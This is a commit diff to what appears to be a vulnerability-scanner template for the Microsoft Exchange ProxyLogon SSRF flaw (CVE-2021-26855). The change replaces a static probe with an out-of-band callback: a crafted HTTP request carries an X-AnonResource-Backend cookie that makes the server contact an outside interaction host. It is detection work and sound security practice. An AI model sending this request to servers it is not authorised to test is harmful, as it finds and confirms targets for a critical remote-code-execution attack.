minor updates
sandeep
parent
68dad33565
commit
b69cd23cf4
|
|
@ -6,7 +6,7 @@ info:
|
||||||
severity: critical
|
severity: critical
|
||||||
description: |
|
description: |
|
||||||
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
|
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
|
||||||
tags: cve,cve2021,ssrf,rce,exchange
|
tags: cve,cve2021,ssrf,rce,exchange,oob
|
||||||
reference: |
|
reference: |
|
||||||
- https://proxylogon.com/#timeline
|
- https://proxylogon.com/#timeline
|
||||||
- https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
|
- https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
|
||||||
|
|
@ -18,19 +18,10 @@ requests:
|
||||||
- |
|
- |
|
||||||
GET /owa/auth/x.js HTTP/1.1
|
GET /owa/auth/x.js HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
Cookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3;
|
||||||
Cookie: X-AnonResource=true; X-AnonResource-Backend=somethingnonexistent/ecp/default.flt?~3; X-BEResource=somethingnonexistent/owa/auth/logon.aspx?~3;
|
|
||||||
Accept-Language: en
|
|
||||||
Connection: close
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 500
|
|
||||||
- 503
|
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
words:
|
words:
|
||||||
- 'X-Calculatedbetarget: somethingnonexistent'
|
- "http"
|
||||||
part: header
|
|
||||||
Loading…
Reference in New Issue